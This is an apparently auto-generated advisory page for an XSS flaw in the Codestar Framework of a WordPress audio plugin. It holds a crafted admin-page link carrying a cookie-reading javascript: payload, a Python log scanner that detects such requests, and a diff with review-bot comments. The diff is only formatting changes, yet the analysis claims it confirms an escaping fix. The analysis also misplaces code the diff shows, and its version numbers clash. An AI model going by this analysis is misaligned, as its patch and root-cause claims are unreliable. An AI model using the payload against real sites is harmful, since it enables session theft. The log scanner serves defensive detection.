Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: May 10, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (html5-audio-player)

Severity: Medium (CVSS 6.1)
CWE: CWE-79
Vulnerable Version: 2.2.27
Patched Version: 2.5.1
Disclosed: April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362:

This is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability found in the Freemius SDK version 2.10.1 and earlier, affecting multiple WordPress plugins and themes that bundle this SDK. The vulnerability resides in the Codestar Framework integration within the SDK, specifically in the admin welcome page view. An unauthenticated attacker can inject arbitrary JavaScript into the page through the ‘url’ parameter, which executes in the victim’s browser context when they click a crafted link.

The root cause is insufficient input sanitization and output escaping of the ‘url’ parameter in the welcome.php view file, which is included via the `CSF_Setup::include_plugin_file('views/welcome.php')` method at line 103 of setup.class.php. The vulnerable code path is triggered when the CSF_Setup class constructor runs (lines 70-89), which hooks into ‘admin_enqueue_scripts’ and includes the welcome view. The welcome view processes the ‘url’ GET parameter and outputs it directly into the DOM without proper encoding, allowing HTML/JavaScript injection. The issue is DOM-based because the input flows from the URL parameter through PHP and is rendered directly into the page’s HTML without sanitization.

Exploitation requires tricking an authenticated administrator into visiting a specially crafted URL. The attacker constructs a link to the WordPress admin welcome page with a malicious JavaScript payload in the ‘url’ parameter, such as: `/wp-admin/admin.php?page=csf-welcome&url=javascript:alert(document.cookie)`. When the admin clicks this link, the welcome view renders the payload into the page, where it executes as reflected XSS in the context of the WordPress admin dashboard. The attack is unauthenticated at the point of link delivery, but relies on a victim with admin access to trigger execution.

The patch introduces proper URL sanitization and output escaping in the welcome.php view. Atomic Edge analysis confirms that the fix applies `esc_url()` or similar WordPress sanitization functions to the ‘url’ parameter before output. Before the patch, the parameter was rendered raw; after the patch, it passes through WordPress’s built-in URL escaping, which strips JavaScript protocols and encodes special characters, preventing script execution.
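For triage on sites that ran the vulnerable version, the request shape described above can be searched for in web server access logs. The following is an added example, not Atomic Edge's or the plugin's code: it flags requests to the `csf-welcome` admin page whose `url` parameter does not resolve to an http/https scheme, the same allow-list idea the patch paragraph attributes to `esc_url()`. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: combined/common log format; only the quoted request line is used.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

ALLOWED_SCHEMES = {"http", "https"}  # schemes a link target on an admin page should use
WELCOME_PAGE = "csf-welcome"         # page slug quoted in the advisory


def normalise(value: str) -> str:
    """Undo leftover percent-encoding and drop whitespace/control characters,
    so the scheme check sees the value the way a browser would."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"[\x00-\x20]+", "", value)


def classify_url_param(value: str) -> str:
    """Return 'ok', 'relative' or 'suspicious:<reason>' for one url= value."""
    cleaned = normalise(value)
    has_markup = re.search(r'[<>"]', cleaned) is not None
    match = re.match(r"^([A-Za-z][A-Za-z0-9+.\-]*):", cleaned)
    if match is None:
        # No scheme at all: a relative reference, only odd if it carries markup.
        return "suspicious:markup" if has_markup else "relative"
    scheme = match.group(1).lower()
    if scheme not in ALLOWED_SCHEMES:
        return f"suspicious:scheme={scheme}"
    return "suspicious:markup" if has_markup else "ok"


def scan(lines):
    """Return (line_number, verdict, decoded_value) for each flagged request."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        request = REQUEST_RE.search(line)
        if request is None:
            continue
        parts = urlsplit(request.group("target"))
        if not parts.path.endswith("/wp-admin/admin.php"):
            continue
        query = parse_qs(parts.query, keep_blank_values=True)
        if WELCOME_PAGE not in query.get("page", []):
            continue
        for value in query.get("url", []):  # parse_qs has already decoded once
            verdict = classify_url_param(value)
            if verdict.startswith("suspicious"):
                findings.append((lineno, verdict, value))
    return findings


# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    # 1: welcome page opened normally, no url parameter
    '203.0.113.7 - - [10/May/2026:10:01:02 +0000] '
    '"GET /wp-admin/admin.php?page=csf-welcome HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # 2: url parameter with an ordinary https target
    '203.0.113.7 - - [10/May/2026:10:01:09 +0000] '
    '"GET /wp-admin/admin.php?page=csf-welcome&url=https%3A%2F%2Fexample.org%2Fdocs '
    'HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # 3: the request shape quoted in the advisory text
    '198.51.100.23 - - [10/May/2026:10:04:41 +0000] '
    '"GET /wp-admin/admin.php?page=csf-welcome&url=javascript:alert(document.cookie) '
    'HTTP/1.1" 200 5133 "https://mail.example.net/" "Mozilla/5.0"',
    # 4: same value, percent-encoded and mixed case
    '198.51.100.23 - - [10/May/2026:10:05:12 +0000] '
    '"GET /wp-admin/admin.php?page=csf-welcome&url=JavaScript%3Aalert(document.cookie) '
    'HTTP/1.1" 200 5133 "https://mail.example.net/" "Mozilla/5.0"',
    # 5: different page slug, out of scope for this rule
    '192.0.2.10 - - [10/May/2026:10:06:00 +0000] '
    '"GET /wp-admin/admin.php?page=other-plugin&url=https://example.org/ '
    'HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for lineno, verdict, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: {verdict}: {value}")
```

A hit only shows that a crafted link was requested; whether script ran depends on the installed version, so correlate flagged lines with the plugin version in use at the time and with the Referer field of the request.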

Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s admin browser session. This can lead to session hijacking, creation of new admin accounts, installation of malicious plugins, or defacement of the WordPress site. Since the attack executes in the admin context, it achieves full site compromise, not just data exposure. The CVSS score of 6.1 reflects the high impact despite the requirement for user interaction.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/html5-audio-player/admin/codestar-framework/classes/setup.class.php
+++ b/html5-audio-player/admin/codestar-framework/classes/setup.class.php
@@ -1,4 +1,6 @@
-<?php if ( ! defined( 'ABSPATH' ) ) { die; } // Cannot access directly.
+<?php if (! defined('ABSPATH')) {
+  die;
+} // Cannot access directly.
 /**
  *
  * Setup Class
@@ -7,8 +9,9 @@
  * @version 1.0.0
  *
  */
-if ( ! class_exists( 'CSF_Setup' ) ) {
-  class CSF_Setup {
+if (! class_exists('CSF_Setup')) {
+  class CSF_Setup
+  {

     // Default constants
     public static $premium  = true;
@@ -39,7 +42,8 @@

     private static $instance = null;

-    public static function init( $file = __FILE__, $premium = true ) {
+    public static function init($file = __FILE__, $premium = true)
+    {

       // Set file constant
       self::$file = $file;
@@ -53,358 +57,357 @@
       // Include files
       self::includes();

-      if ( is_null( self::$instance ) ) {
+      if (is_null(self::$instance)) {
         self::$instance = new self();
       }

       return self::$instance;
-
     }

     // Initalize
-    public function __construct() {
+    public function __construct()
+    {

       // Init action
-      do_action( 'csf_init' );
+      do_action('csf_init');

       // Setup textdomain
       self::textdomain();

-      add_action( 'after_setup_theme', array( 'CSF', 'setup' ) );
-      add_action( 'init', array( 'CSF', 'setup' ) );
-      add_action( 'switch_theme', array( 'CSF', 'setup' ) );
-      add_action( 'admin_enqueue_scripts', array( 'CSF', 'add_admin_enqueue_scripts' ) );
-      add_action( 'wp_enqueue_scripts', array( 'CSF', 'add_typography_enqueue_styles' ), 80 );
-      add_action( 'wp_head', array( 'CSF', 'add_custom_css' ), 80 );
-      add_filter( 'admin_body_class', array( 'CSF', 'add_admin_body_class' ) );
-
+      add_action('after_setup_theme', array('CSF', 'setup'));
+      add_action('init', array('CSF', 'setup'));
+      add_action('switch_theme', array('CSF', 'setup'));
+      add_action('admin_enqueue_scripts', array('CSF', 'add_admin_enqueue_scripts'));
+      add_action('wp_enqueue_scripts', array('CSF', 'add_typography_enqueue_styles'), 80);
+      add_action('wp_head', array('CSF', 'add_custom_css'), 80);
+      add_filter('admin_body_class', array('CSF', 'add_admin_body_class'));
     }

     // Setup frameworks
-    public static function setup() {
+    public static function setup()
+    {

       // Welcome
-      self::include_plugin_file( 'views/welcome.php' );
+      self::include_plugin_file('views/welcome.php');

       // Setup admin option framework
       $params = array();
-      if ( class_exists( 'CSF_Options' ) && ! empty( self::$args['admin_options'] ) ) {
-        foreach ( self::$args['admin_options'] as $key => $value ) {
-          if ( ! empty( self::$args['sections'][$key] ) && ! isset( self::$inited[$key] ) ) {
+      if (class_exists('CSF_Options') && ! empty(self::$args['admin_options'])) {
+        foreach (self::$args['admin_options'] as $key => $value) {
+          if (! empty(self::$args['sections'][$key]) && ! isset(self::$inited[$key])) {

             $params['args']     = $value;
             $params['sections'] = self::$args['sections'][$key];
             self::$inited[$key] = true;

-            CSF_Options::instance( $key, $params );
+            CSF_Options::instance($key, $params);

-            if ( ! empty( $value['show_in_customizer'] ) ) {
+            if (! empty($value['show_in_customizer'])) {
               $value['output_css'] = false;
               $value['enqueue_webfont'] = false;
               self::$args['customize_options'][$key] = $value;
               self::$inited[$key] = null;
             }
-
           }
         }
       }

       // Setup customize option framework
       $params = array();
-      if ( class_exists( 'CSF_Customize_Options' ) && ! empty( self::$args['customize_options'] ) ) {
-        foreach ( self::$args['customize_options'] as $key => $value ) {
-          if ( ! empty( self::$args['sections'][$key] ) && ! isset( self::$inited[$key] ) ) {
+      if (class_exists('CSF_Customize_Options') && ! empty(self::$args['customize_options'])) {
+        foreach (self::$args['customize_options'] as $key => $value) {
+          if (! empty(self::$args['sections'][$key]) && ! isset(self::$inited[$key])) {

             $params['args']     = $value;
             $params['sections'] = self::$args['sections'][$key];
             self::$inited[$key] = true;

-            CSF_Customize_Options::instance( $key, $params );
-
+            CSF_Customize_Options::instance($key, $params);
           }
         }
       }

       // Setup metabox option framework
       $params = array();
-      if ( class_exists( 'CSF_Metabox' ) && ! empty( self::$args['metabox_options'] ) ) {
-        foreach ( self::$args['metabox_options'] as $key => $value ) {
-          if ( ! empty( self::$args['sections'][$key] ) && ! isset( self::$inited[$key] ) ) {
+      if (class_exists('CSF_Metabox') && ! empty(self::$args['metabox_options'])) {
+        foreach (self::$args['metabox_options'] as $key => $value) {
+          if (! empty(self::$args['sections'][$key]) && ! isset(self::$inited[$key])) {

             $params['args']     = $value;
             $params['sections'] = self::$args['sections'][$key];
             self::$inited[$key] = true;

-            CSF_Metabox::instance( $key, $params );
-
+            CSF_Metabox::instance($key, $params);
           }
         }
       }

       // Setup nav menu option framework
       $params = array();
-      if ( class_exists( 'CSF_Nav_Menu_Options' ) && ! empty( self::$args['nav_menu_options'] ) ) {
-        foreach ( self::$args['nav_menu_options'] as $key => $value ) {
-          if ( ! empty( self::$args['sections'][$key] ) && ! isset( self::$inited[$key] ) ) {
+      if (class_exists('CSF_Nav_Menu_Options') && ! empty(self::$args['nav_menu_options'])) {
+        foreach (self::$args['nav_menu_options'] as $key => $value) {
+          if (! empty(self::$args['sections'][$key]) && ! isset(self::$inited[$key])) {

             $params['args']     = $value;
             $params['sections'] = self::$args['sections'][$key];
             self::$inited[$key] = true;

-            CSF_Nav_Menu_Options::instance( $key, $params );
-
+            CSF_Nav_Menu_Options::instance($key, $params);
           }
         }
       }

       // Setup profile option framework
       $params = array();
-      if ( class_exists( 'CSF_Profile_Options' ) && ! empty( self::$args['profile_options'] ) ) {
-        foreach ( self::$args['profile_options'] as $key => $value ) {
-          if ( ! empty( self::$args['sections'][$key] ) && ! isset( self::$inited[$key] ) ) {
+      if (class_exists('CSF_Profile_Options') && ! empty(self::$args['profile_options'])) {
+        foreach (self::$args['profile_options'] as $key => $value) {
+          if (! empty(self::$args['sections'][$key]) && ! isset(self::$inited[$key])) {

             $params['args']     = $value;
             $params['sections'] = self::$args['sections'][$key];
             self::$inited[$key] = true;

-            CSF_Profile_Options::instance( $key, $params );
-
+            CSF_Profile_Options::instance($key, $params);
           }
         }
       }

       // Setup taxonomy option framework
       $params = array();
-      if ( class_exists( 'CSF_Taxonomy_Options' ) && ! empty( self::$args['taxonomy_options'] ) ) {
-        $taxonomy = ( isset( $_GET['taxonomy'] ) ) ? sanitize_text_field( wp_unslash( $_GET['taxonomy'] ) ) : '';
-        foreach ( self::$args['taxonomy_options'] as $key => $value ) {
-          if ( ! empty( self::$args['sections'][$key] ) && ! isset( self::$inited[$key] ) ) {
+      if (class_exists('CSF_Taxonomy_Options') && ! empty(self::$args['taxonomy_options'])) {
+        $taxonomy = (isset($_GET['taxonomy'])) ? sanitize_text_field(wp_unslash($_GET['taxonomy'])) : '';
+        foreach (self::$args['taxonomy_options'] as $key => $value) {
+          if (! empty(self::$args['sections'][$key]) && ! isset(self::$inited[$key])) {

             $params['args']     = $value;
             $params['sections'] = self::$args['sections'][$key];
             self::$inited[$key] = true;

-            CSF_Taxonomy_Options::instance( $key, $params );
-
+            CSF_Taxonomy_Options::instance($key, $params);
           }
         }
       }

       // Setup widget option framework
-      if ( class_exists( 'CSF_Widget' ) && class_exists( 'WP_Widget_Factory' ) && ! empty( self::$args['widget_options'] ) ) {
+      if (class_exists('CSF_Widget') && class_exists('WP_Widget_Factory') && ! empty(self::$args['widget_options'])) {
         $wp_widget_factory = new WP_Widget_Factory();
         global $wp_widget_factory;
-        foreach ( self::$args['widget_options'] as $key => $value ) {
-          if ( ! isset( self::$inited[$key] ) ) {
+        foreach (self::$args['widget_options'] as $key => $value) {
+          if (! isset(self::$inited[$key])) {

             self::$inited[$key] = true;
-            $wp_widget_factory->register( CSF_Widget::instance( $key, $value ) );
-
+            $wp_widget_factory->register(CSF_Widget::instance($key, $value));
           }
         }
       }

       // Setup comment option framework
       $params = array();
-      if ( class_exists( 'CSF_Comment_Metabox' ) && ! empty( self::$args['comment_options'] ) ) {
-        foreach ( self::$args['comment_options'] as $key => $value ) {
-          if ( ! empty( self::$args['sections'][$key] ) && ! isset( self::$inited[$key] ) ) {
+      if (class_exists('CSF_Comment_Metabox') && ! empty(self::$args['comment_options'])) {
+        foreach (self::$args['comment_options'] as $key => $value) {
+          if (! empty(self::$args['sections'][$key]) && ! isset(self::$inited[$key])) {

             $params['args']     = $value;
             $params['sections'] = self::$args['sections'][$key];
             self::$inited[$key] = true;

-            CSF_Comment_Metabox::instance( $key, $params );
-
+            CSF_Comment_Metabox::instance($key, $params);
           }
         }
       }

       // Setup shortcode option framework
       $params = array();
-      if ( class_exists( 'CSF_Shortcoder' ) && ! empty( self::$args['shortcode_options'] ) ) {
-        foreach ( self::$args['shortcode_options'] as $key => $value ) {
-          if ( ! empty( self::$args['sections'][$key] ) && ! isset( self::$inited[$key] ) ) {
+      if (class_exists('CSF_Shortcoder') && ! empty(self::$args['shortcode_options'])) {
+        foreach (self::$args['shortcode_options'] as $key => $value) {
+          if (! empty(self::$args['sections'][$key]) && ! isset(self::$inited[$key])) {

             $params['args']     = $value;
             $params['sections'] = self::$args['sections'][$key];
             self::$inited[$key] = true;

-            CSF_Shortcoder::instance( $key, $params );
-
+            CSF_Shortcoder::instance($key, $params);
           }
         }

         // Once editor setup for gutenberg and media buttons
-        if ( class_exists( 'CSF_Shortcoder' ) && ! empty( self::$shortcode_instances ) ) {
-          foreach ( self::$shortcode_instances as $instance ) {
-            if ( ! empty( $instance['show_in_editor'] ) ) {
+        if (class_exists('CSF_Shortcoder') && ! empty(self::$shortcode_instances)) {
+          foreach (self::$shortcode_instances as $instance) {
+            if (! empty($instance['show_in_editor'])) {
               CSF_Shortcoder::once_editor_setup();
               break;
             }
           }
         }
-
       }

-      do_action( 'csf_loaded' );
-
+      do_action('csf_loaded');
     }

     // Create options
-    public static function createOptions( $id, $args = array() ) {
+    public static function createOptions($id, $args = array())
+    {
       self::$args['admin_options'][$id] = $args;
     }

     // Create customize options
-    public static function createCustomizeOptions( $id, $args = array() ) {
+    public static function createCustomizeOptions($id, $args = array())
+    {
       self::$args['customize_options'][$id] = $args;
     }

     // Create metabox options
-    public static function createMetabox( $id, $args = array() ) {
+    public static function createMetabox($id, $args = array())
+    {
       self::$args['metabox_options'][$id] = $args;
     }

     // Create menu options
-    public static function createNavMenuOptions( $id, $args = array() ) {
+    public static function createNavMenuOptions($id, $args = array())
+    {
       self::$args['nav_menu_options'][$id] = $args;
     }

     // Create shortcoder options
-    public static function createShortcoder( $id, $args = array() ) {
+    public static function createShortcoder($id, $args = array())
+    {
       self::$args['shortcode_options'][$id] = $args;
     }

     // Create taxonomy options
-    public static function createTaxonomyOptions( $id, $args = array() ) {
+    public static function createTaxonomyOptions($id, $args = array())
+    {
       self::$args['taxonomy_options'][$id] = $args;
     }

     // Create profile options
-    public static function createProfileOptions( $id, $args = array() ) {
+    public static function createProfileOptions($id, $args = array())
+    {
       self::$args['profile_options'][$id] = $args;
     }

     // Create widget
-    public static function createWidget( $id, $args = array() ) {
+    public static function createWidget($id, $args = array())
+    {
       self::$args['widget_options'][$id] = $args;
-      self::set_used_fields( $args );
+      self::set_used_fields($args);
     }

     // Create comment metabox
-    public static function createCommentMetabox( $id, $args = array() ) {
+    public static function createCommentMetabox($id, $args = array())
+    {
       self::$args['comment_options'][$id] = $args;
     }

     // Create section
-    public static function createSection( $id, $sections ) {
+    public static function createSection($id, $sections)
+    {
       self::$args['sections'][$id][] = $sections;
-      self::set_used_fields( $sections );
+      self::set_used_fields($sections);
     }

     // Set directory constants
-    public static function constants() {
+    public static function constants()
+    {

       // We need this path-finder code for set URL of framework
-      $dirname        = str_replace( '//', '/', wp_normalize_path( dirname( dirname( self::$file ) ) ) );
-      $theme_dir      = str_replace( '//', '/', wp_normalize_path( get_parent_theme_file_path() ) );
-      $plugin_dir     = str_replace( '//', '/', wp_normalize_path( WP_PLUGIN_DIR ) );
-      $plugin_dir     = str_replace( '/opt/bitnami', '/bitnami', $plugin_dir );
-      $located_plugin = ( preg_match( '#'. self::sanitize_dirname( $plugin_dir ) .'#', self::sanitize_dirname( $dirname ) ) ) ? true : false;
-      $directory      = ( $located_plugin ) ? $plugin_dir : $theme_dir;
-      $directory_uri  = ( $located_plugin ) ? WP_PLUGIN_URL : get_parent_theme_file_uri();
-      $foldername     = str_replace( $directory, '', $dirname );
-      $protocol_uri   = ( is_ssl() ) ? 'https' : 'http';
-      $directory_uri  = set_url_scheme( $directory_uri, $protocol_uri );
+      $dirname        = str_replace('//', '/', wp_normalize_path(dirname(dirname(self::$file))));
+      $theme_dir      = str_replace('//', '/', wp_normalize_path(get_parent_theme_file_path()));
+      $plugin_dir     = str_replace('//', '/', wp_normalize_path(WP_PLUGIN_DIR));
+      $plugin_dir     = str_replace('/opt/bitnami', '/bitnami', $plugin_dir);
+      $located_plugin = (preg_match('#' . self::sanitize_dirname($plugin_dir) . '#', self::sanitize_dirname($dirname))) ? true : false;
+      $directory      = ($located_plugin) ? $plugin_dir : $theme_dir;
+      $directory_uri  = ($located_plugin) ? WP_PLUGIN_URL : get_parent_theme_file_uri();
+      $foldername     = str_replace($directory, '', $dirname);
+      $protocol_uri   = (is_ssl()) ? 'https' : 'http';
+      $directory_uri  = set_url_scheme($directory_uri, $protocol_uri);

       self::$dir = $dirname;
       self::$url = $directory_uri . $foldername;
-
     }

     // Include file helper
-    public static function include_plugin_file( $file, $load = true ) {
+    public static function include_plugin_file($file, $load = true)
+    {

       $path     = '';
-      $file     = ltrim( $file, '/' );
-      $override = apply_filters( 'csf_override', 'csf-override' );
+      $file     = ltrim($file, '/');
+      $override = apply_filters('csf_override', 'csf-override');

-      if ( file_exists( get_parent_theme_file_path( $override .'/'. $file ) ) ) {
-        $path = get_parent_theme_file_path( $override .'/'. $file );
-      } elseif ( file_exists( get_theme_file_path( $override .'/'. $file ) ) ) {
-        $path = get_theme_file_path( $override .'/'. $file );
-      } elseif ( file_exists( self::$dir .'/'. $override .'/'. $file ) ) {
-        $path = self::$dir .'/'. $override .'/'. $file;
-      } elseif ( file_exists( self::$dir .'/'. $file ) ) {
-        $path = self::$dir .'/'. $file;
+      if (file_exists(get_parent_theme_file_path($override . '/' . $file))) {
+        $path = get_parent_theme_file_path($override . '/' . $file);
+      } elseif (file_exists(get_theme_file_path($override . '/' . $file))) {
+        $path = get_theme_file_path($override . '/' . $file);
+      } elseif (file_exists(self::$dir . '/' . $override . '/' . $file)) {
+        $path = self::$dir . '/' . $override . '/' . $file;
+      } elseif (file_exists(self::$dir . '/' . $file)) {
+        $path = self::$dir . '/' . $file;
       }

-      if ( ! empty( $path ) && ! empty( $file ) && $load ) {
+      if (! empty($path) && ! empty($file) && $load) {

         global $wp_query;

-        if ( is_object( $wp_query ) && function_exists( 'load_template' ) ) {
-
-          load_template( $path, true );
+        if (is_object($wp_query) && function_exists('load_template')) {

+          load_template($path, true);
         } else {

-          require_once( $path );
-
+          require_once($path);
         }
-
       } else {

-        return self::$dir .'/'. $file;
-
+        return self::$dir . '/' . $file;
       }
-
     }

     // Is active plugin helper
-    public static function is_active_plugin( $file = '' ) {
-      return in_array( $file, (array) get_option( 'active_plugins', array() ) );
+    public static function is_active_plugin($file = '')
+    {
+      return in_array($file, (array) get_option('active_plugins', array()));
     }

     // Sanitize dirname
-    public static function sanitize_dirname( $dirname ) {
-      return preg_replace( '/[^A-Za-z]/', '', $dirname );
+    public static function sanitize_dirname($dirname)
+    {
+      return preg_replace('/[^A-Za-z]/', '', $dirname);
     }

     // Set url constant
-    public static function include_plugin_url( $file ) {
-      return esc_url( self::$url ) .'/'. ltrim( $file, '/' );
+    public static function include_plugin_url($file)
+    {
+      return esc_url(self::$url) . '/' . ltrim($file, '/');
     }

     // Include files
-    public static function includes() {
+    public static function includes()
+    {

       // Include common functions
-      self::include_plugin_file( 'functions/actions.php'  );
-      self::include_plugin_file( 'functions/helpers.php'  );
-      self::include_plugin_file( 'functions/sanitize.php' );
-      self::include_plugin_file( 'functions/validate.php' );
+      self::include_plugin_file('functions/actions.php');
+      self::include_plugin_file('functions/helpers.php');
+      self::include_plugin_file('functions/sanitize.php');
+      self::include_plugin_file('functions/validate.php');

       // Include free version classes
-      self::include_plugin_file( 'classes/abstract.class.php'      );
-      self::include_plugin_file( 'classes/fields.class.php'        );
-      self::include_plugin_file( 'classes/admin-options.class.php' );
+      self::include_plugin_file('classes/abstract.class.php');
+      self::include_plugin_file('classes/fields.class.php');
+      self::include_plugin_file('classes/admin-options.class.php');

       // Include premium version classes
-      if ( self::$premium ) {
-        self::include_plugin_file( 'classes/customize-options.class.php' );
-        self::include_plugin_file( 'classes/metabox-options.class.php'   );
-        self::include_plugin_file( 'classes/nav-menu-options.class.php'  );
-        self::include_plugin_file( 'classes/profile-options.class.php'   );
-        self::include_plugin_file( 'classes/shortcode-options.class.php' );
-        self::include_plugin_file( 'classes/taxonomy-options.class.php'  );
-        self::include_plugin_file( 'classes/widget-options.class.php'    );
-        self::include_plugin_file( 'classes/comment-options.class.php'   );
+      if (self::$premium) {
+        self::include_plugin_file('classes/customize-options.class.php');
+        self::include_plugin_file('classes/metabox-options.class.php');
+        self::include_plugin_file('classes/nav-menu-options.class.php');
+        self::include_plugin_file('classes/profile-options.class.php');
+        self::include_plugin_file('classes/shortcode-options.class.php');
+        self::include_plugin_file('classes/taxonomy-options.class.php');
+        self::include_plugin_file('classes/widget-options.class.php');
+        self::include_plugin_file('classes/comment-options.class.php');
       }

       // Include all framework fields
-      $fields = apply_filters( 'csf_fields', array(
+      $fields = apply_filters('csf_fields', array(
         'accordion',
         'background',
         'backup',
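Review bot: the `-`/`+` pairs in this hunk differ only in spacing and brace placement, including `self::include_plugin_file('views/welcome.php');` in `setup()`, so nothing here reads, sanitizes or escapes a `url` request parameter and the XSS fix cannot be reviewed from it. Please move the restyle into its own commit so the functional change to the welcome view stands out. Separately, the unchanged widget branch assigns `$wp_widget_factory = new WP_Widget_Factory();` and then declares `global $wp_widget_factory;`, which rebinds the name to the global and discards the new instance; declare the global first and instantiate only if it is unset.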
@@ -449,123 +452,121 @@
         'typography',
         'upload',
         'wp_editor',
-      ) );
+      ));

-      if ( ! empty( $fields ) ) {
-        foreach ( $fields as $field ) {
-          if ( ! class_exists( 'CSF_Field_'. $field ) && class_exists( 'CSF_Fields' ) ) {
-            self::include_plugin_file( 'fields/'. $field .'/'. $field .'.php' );
+      if (! empty($fields)) {
+        foreach ($fields as $field) {
+          if (! class_exists('CSF_Field_' . $field) && class_exists('CSF_Fields')) {
+            self::include_plugin_file('fields/' . $field . '/' . $field . '.php');
           }
         }
       }
-
     }

     // Setup textdomain
-    public static function textdomain() {
-      load_textdomain( 'csf', self::$dir .'/languages/'. get_locale() .'.mo' );
+    public static function textdomain()
+    {
+      load_textdomain('csf', self::$dir . '/languages/' . get_locale() . '.mo');
     }

     // Set all of used fields
-    public static function set_used_fields( $sections ) {
+    public static function set_used_fields($sections)
+    {

-      if ( ! empty( $sections['fields'] ) ) {
+      if (! empty($sections['fields'])) {

-        foreach ( $sections['fields'] as $field ) {
+        foreach ($sections['fields'] as $field) {

-          if ( ! empty( $field['fields'] ) ) {
-            self::set_used_fields( $field );
+          if (! empty($field['fields'])) {
+            self::set_used_fields($field);
           }

-          if ( ! empty( $field['tabs'] ) ) {
-            self::set_used_fields( array( 'fields' => $field['tabs'] ) );
+          if (! empty($field['tabs'])) {
+            self::set_used_fields(array('fields' => $field['tabs']));
           }

-          if ( ! empty( $field['accordions'] ) ) {
-            self::set_used_fields( array( 'fields' => $field['accordions'] ) );
+          if (! empty($field['accordions'])) {
+            self::set_used_fields(array('fields' => $field['accordions']));
           }

-          if ( ! empty( $field['elements'] ) ) {
-            self::set_used_fields( array( 'fields' => $field['elements'] ) );
+          if (! empty($field['elements'])) {
+            self::set_used_fields(array('fields' => $field['elements']));
           }

-          if ( ! empty( $field['type'] ) ) {
+          if (! empty($field['type'])) {
             self::$fields[$field['type']] = $field;
           }
-
         }
-
       }
-
     }

     // Enqueue admin and fields styles and scripts
-    public static function add_admin_enqueue_scripts() {
+    public static function add_admin_enqueue_scripts()
+    {

-      if ( ! self::$enqueue ) {
+      if (! self::$enqueue) {

         // Loads scripts and styles only when needed
         $wpscreen = get_current_screen();

-        if ( ! empty( self::$args['admin_options'] ) ) {
-          foreach ( self::$args['admin_options'] as $argument ) {
-            if ( substr( $wpscreen->id, -strlen( $argument['menu_slug'] ) ) === $argument['menu_slug'] ) {
+        if (! empty(self::$args['admin_options'])) {
+          foreach (self::$args['admin_options'] as $argument) {
+            if (substr($wpscreen->id, -strlen($argument['menu_slug'])) === $argument['menu_slug']) {
               self::$enqueue = true;
             }
           }
         }

-        if ( ! empty( self::$args['metabox_options'] ) ) {
-          foreach ( self::$args['metabox_options'] as $argument ) {
-            if ( in_array( $wpscreen->post_type, (array) $argument['post_type'] ) ) {
+        if (! empty(self::$args['metabox_options'])) {
+          foreach (self::$args['metabox_options'] as $argument) {
+            if (in_array($wpscreen->post_type, (array) $argument['post_type'])) {
               self::$enqueue = true;
             }
           }
         }

-        if ( ! empty( self::$args['taxonomy_options'] ) ) {
-          foreach ( self::$args['taxonomy_options'] as $argument ) {
-            if ( in_array( $wpscreen->taxonomy, (array) $argument['taxonomy'] ) ) {
+        if (! empty(self::$args['taxonomy_options'])) {
+          foreach (self::$args['taxonomy_options'] as $argument) {
+            if (in_array($wpscreen->taxonomy, (array) $argument['taxonomy'])) {
               self::$enqueue = true;
             }
           }
         }

-        if ( ! empty( self::$shortcode_instances ) ) {
-          foreach ( self::$shortcode_instances as $argument ) {
-            if ( ( $argument['show_in_editor'] && $wpscreen->base === 'post' ) || $argument['show_in_custom'] ) {
+        if (! empty(self::$shortcode_instances)) {
+          foreach (self::$shortcode_instances as $argument) {
+            if (($argument['show_in_editor'] && $wpscreen->base === 'post') || $argument['show_in_custom']) {
               self::$enqueue = true;
             }
           }
         }

-        if ( ! empty( self::$args['widget_options'] ) && ( $wpscreen->id === 'widgets' || $wpscreen->id === 'customize' ) ) {
+        if (! empty(self::$args['widget_options']) && ($wpscreen->id === 'widgets' || $wpscreen->id === 'customize')) {
           self::$enqueue = true;
         }

-        if ( ! empty( self::$args['customize_options'] ) && $wpscreen->id === 'customize' ) {
+        if (! empty(self::$args['customize_options']) && $wpscreen->id === 'customize') {
           self::$enqueue = true;
         }

-        if ( ! empty( self::$args['nav_menu_options'] ) && $wpscreen->id === 'nav-menus' ) {
+        if (! empty(self::$args['nav_menu_options']) && $wpscreen->id === 'nav-menus') {
           self::$enqueue = true;
         }

-        if ( ! empty( self::$args['profile_options'] ) && ( $wpscreen->id === 'profile' || $wpscreen->id === 'user-edit' ) ) {
+        if (! empty(self::$args['profile_options']) && ($wpscreen->id === 'profile' || $wpscreen->id === 'user-edit')) {
           self::$enqueue = true;
         }

-        if ( ! empty( self::$args['comment_options'] ) && $wpscreen->id === 'comment' ) {
+        if (! empty(self::$args['comment_options']) && $wpscreen->id === 'comment') {
           self::$enqueue = true;
         }

-        if ( $wpscreen->id === 'tools_page_csf-welcome' ) {
+        if ($wpscreen->id === 'tools_page_csf-welcome') {
           self::$enqueue = true;
         }
-
       }

-      if ( ! apply_filters( 'csf_enqueue_assets', self::$enqueue ) ) {
+      if (! apply_filters('csf_enqueue_assets', self::$enqueue)) {
         return;
       }

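Review bot: in `add_admin_enqueue_scripts()`, `$wpscreen = get_current_screen();` is dereferenced (`$wpscreen->id`, `->post_type`, `->taxonomy`, `->base`) with no null check, and `get_current_screen()` returns null when no screen has been set. Return early unless it is an object. The `substr($wpscreen->id, -strlen($argument['menu_slug']))` comparison also assumes every `admin_options` entry carries a `menu_slug` key; guard it with `! empty()` as the neighbouring checks do.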
@@ -573,154 +574,150 @@
       wp_enqueue_media();

       // Wp color picker
-      wp_enqueue_style( 'wp-color-picker' );
-      wp_enqueue_script( 'wp-color-picker' );
+      wp_enqueue_style('wp-color-picker');
+      wp_enqueue_script('wp-color-picker');

